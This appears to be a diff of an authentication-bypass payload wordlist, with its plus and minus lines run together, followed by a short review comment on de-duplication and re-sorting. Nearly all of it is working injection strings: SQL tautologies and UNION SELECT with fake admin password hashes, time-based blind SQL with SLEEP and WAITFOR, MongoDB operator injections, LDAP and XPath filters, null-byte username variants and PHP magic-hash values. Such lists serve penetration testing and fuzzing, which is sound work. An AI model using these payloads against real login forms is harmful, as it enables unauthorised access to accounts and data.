+')*''-- 2 +')*''/* +')*(' +')-''# +')-''-- 2 +')-''/* +')-(' +')-- 2 +')/* +')=''# +')=''-- 2 +')=''/* +')=(' +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)# +')UniON(SElecT(1),2,3,4,5)-- 2 +')^''# +')^''-- 2 +')^''/* +')^(' +')oR 2 oR(' +')oR 2# +')oR 2-- 2 +')oR 2/* +')oR 2=2 oR(' +')oR 2=2# +')oR 2=2-- 2 +')oR 2=2/* +')oR true oR(' +')oR true# +')oR true-- 2 +')oR true/* +')oR'2'# +')oR'2'-- 2 +')oR'2'/* +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1/* +')oR'2'='2'# +')oR'2'='2'-- 2 +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR'2'=('2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR'2'LiKE('2 +')oR'2'oR(' +')oR('2 +')oR(2)# +')oR(2)-- 2 +')oR(2)/* +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)/* +')oR(2)=(2)oR(' +')oR(2)=2# +')oR(2)=2-- 2 +')oR(2)=2/* +')oR(2)LiKE(2)# +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +')oR(2)oR(' +')oR(true)# +')oR(true)-- 2 +')oR(true)/* +')oR(true)oR(' +')oR/**/2# +')oR/**/2-- 2 +')oR/**/2/* +')oR/**/2/**/oR(' +')oR/**/2=2# +')oR/**/2=2-- 2 +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR/**/true# +')oR/**/true-- 2 +')oR/**/true/* +')oR/**/true/**/oR(' +')||'2'='2'||(' +')||'2'=('2 +')||'2'LiKE'2'# +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||'2'LiKE('2 +')||'2'||(' +')||('2 +')||(2)LiKE(2)# +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +')||2# +')||2-- 2 +')||2/* +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)/* +')||2=2# +')||2=2-- 2 +')||2=2/* +')||2=2||(' +')||2||(' +')||true# +')||true-- 2 +')||true/* +')||true||(' +'*' +'*''# +'*''-- 2 +'*''/* +', $or: [ {}, { 'a':'a +', $where: '1 == 1' +'-' +'-''# +'-''-- 2 +'-''/* +'-- +'-- 2 +'/* +';return 'a'=='a' && ''==' '="or' +'=' +'=' 'or' and '=' 'or' +'=''# +'=''-- 2 +'=''/* +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2)-- 2 
+'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)# +'UniON(SElecT(1),2,3,4,5)-- 2 +'^' +'^''# +'^''-- 2 +'^''/* +'oR 2 oR' +'oR 2# +'oR 2-- 2 +'oR 2/* +'oR 2=2 oR' +'oR 2=2# +'oR 2=2-- 2 +'oR 2=2/* +'oR true oR' +'oR true# +'oR true-- 2 +'oR true/* +'oR'2 +'oR'2'# +'oR'2'-- 2 +'oR'2'/* +'oR'2'='2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1/* +'oR'2'='2'# +'oR'2'='2'-- 2 +'oR'2'='2'/* +'oR'2'='2'oR' +'oR'2'LiKE'2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR'2'oR' +'oR(2)# +'oR(2)-- 2 +'oR(2)/* +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)/* +'oR(2)=(2)oR' +'oR(2)=2# +'oR(2)=2-- 2 +'oR(2)=2/* +'oR(2)LiKE(2)# +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +'oR(2)oR' +'oR(true)# +'oR(true)-- 2 +'oR(true)/* +'oR(true)oR' +'oR/**/2# +'oR/**/2-- 2 +'oR/**/2/* +'oR/**/2/**/oR' +'oR/**/2=2# +'oR/**/2=2-- 2 +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR/**/true# +'oR/**/true-- 2 +'oR/**/true/* +'oR/**/true/**/oR' +'or 1=1 or ''=' +'or contains(.,'adm') or' +'or contains(name,'adm') or' +'or position()=2 or' +'or string-length(name(.))<10 or' +'or'1=1 +'or'1=1′ +'||'2 +'||'2'='2 +'||'2'='2'||' +'||'2'LiKE'2 +'||'2'LiKE'2'# +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||'2'||' +'||(2)LiKE(2)# +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +'||2# +'||2-- 2 +'||2/* +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)/* +'||2=2# +'||2=2-- 2 +'||2=2/* +'||2=2||' +'||2||' +'||true# +'||true-- 2 +'||true/* +'||true||' +) or '1′='1– +) or ('1′='1– +* +*)(& +*)(|(& +*)(|(* +*))%00 +, $where: '1 == 1' +0"<"2 +0"<"2"# +0"<"2"-- 2 +0"<"2"/* +0")<"2# +0")<"2-- 2 +0")<"2/* +0")<("2 +0'<'2 +0'<'2'# +0'<'2'-- 2 +0'<'2'/* +0')<'2'# +0')<'2'-- 2 +0')<'2'/* +0')<('2 +0;return true +1, $where: '1 == 1' +1234 +1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220 +1234 " AND 1=0 UNION ALL SELECT 
"admin", "81dc9bdb52d04dc20036dbd8313ed055 +1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220 +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +123456 +1′) and '1′='1– +240610708 += +== +ADMIN +ADMIN"-- +ADMIN'-- +ADMIN'oR'1'='1 +AdMiN +AdMiN"-- +AdMiN'-- +AdMiN'oR'1'='1 Pass1234. -Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658 -Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'# -Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234. -Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')# -Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61 -Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'# -Pass1234.' and 1=0 union select 'admin',sha('Pass1234. -Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')# -Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658 -Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"# Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234. Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")# Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61 Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"# +Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658 +Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"# Pass1234." and 1=0 union select "admin",sha("Pass1234. Pass1234." 
and 1=0 union select "admin",sha("Pass1234.")# -%A8%27 Or 1=1-- 2 -%8C%A8%27 Or 1=1-- 2 -%bf' Or 1=1 -- 2 -%A8%27 Or 1-- 2 -%8C%A8%27 Or 1-- 2 -%bf' Or 1-- 2 -%A8%27Or(1)-- 2 -%8C%A8%27Or(1)-- 2 -%bf'Or(1)-- 2 -%A8%27||1-- 2 -%8C%A8%27||1-- 2 -%bf'||1-- 2 -%A8%27) Or 1=1-- 2 -%8C%A8%27) Or 1=1-- 2 -%bf') Or 1=1 -- 2 -%A8%27) Or 1-- 2 -%8C%A8%27) Or 1-- 2 -%bf') Or 1-- 2 -%A8%27)Or(1)-- 2 -%8C%A8%27)Or(1)-- 2 -%bf')Or(1)-- 2 -%A8%27)||1-- 2 -%8C%A8%27)||1-- 2 -%bf')||1-- 2 -240610708 -true, $where: '1 == 1' -, $where: '1 == 1' -$where: '1 == 1' -', $where: '1 == 1' -1, $where: '1 == 1' -{ $ne: 1 } -', $or: [ {}, { 'a':'a -' } ], $comment:'successful MongoDB injection' +Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234. +Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')# +Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61 +Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'# +Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658 +Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'# +Pass1234.' and 1=0 union select 'admin',sha('Pass1234. +Pass1234.' 
and 1=0 union select 'admin',sha('Pass1234.')# +QNKCDZO +[$ne]=1 +[$ne]=toto +[$regex]=a.* +\u0041dmin +\u0061\u0064\u006d\u0069\u006e +\u0061dmin +\u0070assword +\uFF41dmin +_admin +a%min +aDmIn +aDmIn"# +aDmIn'# +a_min +aaaaaaaaaaaaaaaa +aabg7XSs +ad\u006din +admin +admin" # +admin" -- +admin" or "1"="1 +admin" or "1"="1"# +admin" or "1"="1"-- +admin" or "1"="1"/* +admin" or 1=1 +admin" or 1=1# +admin" or 1=1-- +admin" or 1=1/* +admin"# +admin") AND "x"="x +admin") AND SLEEP(5)-- +admin") or "1"="1 +admin") or "1"="1"# +admin") or "1"="1"-- +admin") or "1"="1"/* +admin") or ("1"="1 +admin") or ("1"="1"# +admin") or ("1"="1"-- +admin") or ("1"="1"/* +admin")# +admin")-- 2 +admin"-- 2 +admin"/* +admin"or 1=1 or ""=" +admin% +admin%00 +admin%00"-- +admin%00' OR '1'='1 +admin%00'-- +admin%09 +admin%0a +admin%0d +admin%20 +admin%2b +admin' # +admin' -- +admin' AND 'x'<>'y +admin' AND 1<2-- +admin' AND 2>1-- +admin' AND 3<>4# +admin' AND ASCII('a')=97-- +admin' AND BENCHMARK(1000000,MD5('test'))-- +admin' AND EXISTS(SELECT * FROM users)-- +admin' AND LENGTH('a')=1-- +admin' AND NOT EXISTS(SELECT * FROM fake_table)-- +admin' AND SLEEP(10)# +admin' AND SLEEP(5)-- +admin' AND pg_sleep(5)-- +admin' UNION SELECT IF(1=1,SLEEP(5),0)-- +admin' WAITFOR DELAY '0:0:10'# +admin' WAITFOR DELAY '0:0:5'-- +admin' and substring(password/text(),1,1)='7 +admin' or ' +admin' or '1'='1 +admin' or '1'='1'# +admin' or '1'='1'-- +admin' or '1'='1'/* +admin' or '1'='2 +admin' or 1=1 +admin' or 1=1# +admin' or 1=1-- +admin' or 1=1/* +admin'# +admin') AND 'x'='x +admin') AND SLEEP(5)-- +admin') or '1'='1 +admin') or '1'='1'# +admin') or '1'='1'-- +admin') or '1'='1'/* +admin') or ('1'='1 +admin') or ('1'='1'# +admin') or ('1'='1'-- +admin') or ('1'='1'/* +admin')# +admin')-- 2 +admin')/* +admin'-- 2 +admin'/* +admin'; SELECT pg_sleep(10)-- +admin'or 1=1 or ''=' +admin)(!(&(| +admin)(&) +admin))(|(| +admin+ +admin00000000000 +admin\0 +admin\0' OR '1'='1 +admin\x00 +admin\x00'-- 
+admin\x00\x00\x00\x00 +admin_ +adminxxxxxxxxxxx +and 1=1 +and 1=1– db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 -|| 1==1 -' && this.password.match(/.*/)//+%00 -' && this.passwordzz.match(/.*/)//+%00 -'%20%26%26%20this.password.match(/.*/)//+%00 -'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +ffifdyop +guest +like '%' +or 0=0 # +or 0=0 -- +or 0=0 – +or 1=1 +or 1=1# +or 1=1-- +or 1=1/* +or 1=1– +or true +or true-- +password +password%00 +password\x00 +pwd +pwd) +pwd)) +root +test +toor +true, $where: '1 == 1' +{ $ne: 1 } +{"$gt": undefined} +{"$ne": "bar"} +{"$ne": null} {$gt: ''} -[$ne]=1 -';return 'a'=='a' && ''==' -";return(true);var xyz='a -0;return true - +|| 1==1
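Review bot: The new side still lists `' or 0=0 #` twice, once after `' group by username having 1=1--` and once after `' or /* or '`, so the de-duplication looks byte-exact and keeps entries that differ only in whitespace; the two are indistinguishable as rendered here, so this is inferred from their different sort positions. If such variants are intentional, say so in the commit message; otherwise compare entries after whitespace normalisation. The file is also re-sorted, which the subject does not mention; this drops the old side's apparent grouping by category and makes an 864/868-line rewrite hard to audit against a net removal of four lines. A message line such as `Sorted bytewise and removed exact duplicates; entries are no longer grouped by category` would let a reviewer reproduce and verify the result.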